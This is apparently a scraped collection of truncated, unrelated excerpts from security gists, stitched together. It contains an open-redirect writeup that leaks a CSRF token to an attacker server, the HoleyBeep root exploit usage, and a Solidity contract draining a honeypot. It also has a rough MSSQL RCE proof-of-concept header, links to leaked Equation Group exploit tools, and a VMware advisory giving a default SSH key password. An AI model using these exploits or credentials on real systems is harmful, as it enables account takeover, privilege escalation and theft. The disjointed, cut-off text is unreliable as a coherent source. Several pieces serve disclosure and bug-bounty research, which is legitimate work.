stefanocoding

You do not need to run 80 reconnaissance tools to get access to user accounts

An open redirect was almost everything I needed in two different bug bounty programs to get access to user accounts. In one of the cases a JWT was leaked, and in the other the CSRF token was leaked. The issue was mostly the same in both cases: not validating, or URI encoding, user input in the client-side, and sending sensitive information to my server using an open redirect.

CSRF token bug

1. There is an open redirect on https://example.com/redirect?url=https://myserver.com/attack.php
2. User loads https://example.com/?code=VALUE
3. Javascript code in https://example.com/ makes a GET request to https://example.com/verify/VALUE with a header x-csrf-token set to the CSRF token for the session of the user

   GET /verify/VALUE HTTP/1.1
   Host: example.com
   

3xocyte

#!/usr/bin/env python

# for more info: https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html
# this is a rough PoC

# requirements for RCE:
# - the attacker needs to either have or create an object with a service principal name
# - the MSSQL server has to be running under the context of System/Network Service/a virtual account
# - the MSSQL server has the WebClient service installed and running (not default on Windows Server hosts)
# - NTLM has to be in use

Arignir

HoleyBeep

This is an exploit for HoleyBeep.

To use it, place any command you want root to execute in /tmp/x.

$ cat /tmp/x
echo PWNED $(whoami)

pertsev

contract Exploit {
    function Exploit(Gift_1_ETH _target) public payable {
        _target.SetPass.value(1 ether)("\xc3\x03\x12\x06\xeb\x04\x20\x5d\xf8\x6d\x32\x84\x68\xd9\xb0\x95\x59\x69\x92\x90\xb6\x42\x6a\xba\xd0\x4b\xb0\xda\x91\x77\xe4\xba");
        _target.GetGift("\x66\x72\x6f\x6e\x74\x2d\x72\x75\x6e\x6e\x69\x6e\x67\x20\x68\x6f\x6e\x65\x79\x70\x6f\x74\x20\x66\x61\x69\x6c");
        selfdestruct(msg.sender);
    }
    
    function() payable {}
}

bontchev

Links describing the leaked EQ Group tools for Windows

Repositories and ports

• Lost in Translation - A repository of the leaked tools

• MS17-010 - Port of some of the exploits to Windows 10

Installation and usage guides

jaredcatkinson

function Get-InjectedThread
{
    <# 
    
    .SYNOPSIS 
    
    Looks for threads that were created as a result of code injection.
    
    .DESCRIPTION
    

phroxvs

# Background and description

The VMware vSphere Data Protection (VDP) appliance is based on the EMC Avamar solution. To perform an in-depth analysis of VDP, a virtual test appliance of EMC Avamar was downloaded. Known Avamar default credentials did work fine on the Avamar appliance, but were not valid to log into the vSphere Data Protection. Further file system objects in the EMC Avamar appliance were analyzed, leading to the interesting detection of a private SSH key belonging to the admin user.

A web search did reveal that the corresponding password for the SSH key file is ‘P3t3rPan’ (see http://judsonian.com/content/licensing-an-avamar-system/). Using the SSH key file a login as admin to the VMware Data Protection was successful and did grant root permissions on the appliance.

# Disclosure timeline

11.08.2016 report of vulnerability to VMware Security Response team

rygorous

Why do compilers even bother with exploiting undefinedness signed overflow? And what are those
mysterious cases where it helps?

A lot of people (myself included) are against transforms that aggressively exploit undefined behavior, but
I think it's useful to know what compiler writers are accomplishing by this.

TL;DR: C doesn't work very well if int!=register width, but (for backwards compat) int is 32-bit on all
major 64-bit targets, and this causes quite hairy problems for code generation and optimization in some
fairly common cases. The signed overflow UB exploitation is an attempt to work around this.

inability

This Gist describes various vulnerabilities in "booter sources", i.e. source code that is used for the frontends of "booter"/"stresser" services that offers DDoS attacks on demand.

Unknown Booter Source

I'm not sure where this particular source code comes from. I've seen it under the names "vDos Source", "Rage Booter", "Dream Source" and "MHC-Panic Booter Source".

Persistent XSS

There exists a persistent cross-site scripting vulnerability in the admin/manage.php script. When users sign up, they are asked to input an email address. The email is validated with PHP's FILTER_VALIDATE_EMAIL filter, which is relaxed with the emails that it accepts. The manage.php script, when called, displays the user's email without sanitising or filtering it.

kennwhite

Most VPN Services are Terrible

Short version: I strongly do not recommend using any of these providers. You are, of course, free to use whatever you like. My TL;DR advice: Roll your own and use Algo or Streisand. For messaging & voice, use Signal. For increased anonymity, use Tor for desktop (though recognize that doing so may actually put you at greater risk), and Onion Browser for mobile.

This mini-rant came on the heels of an interesting twitter discussion: https://twitter.com/kennwhite/status/591074055018582016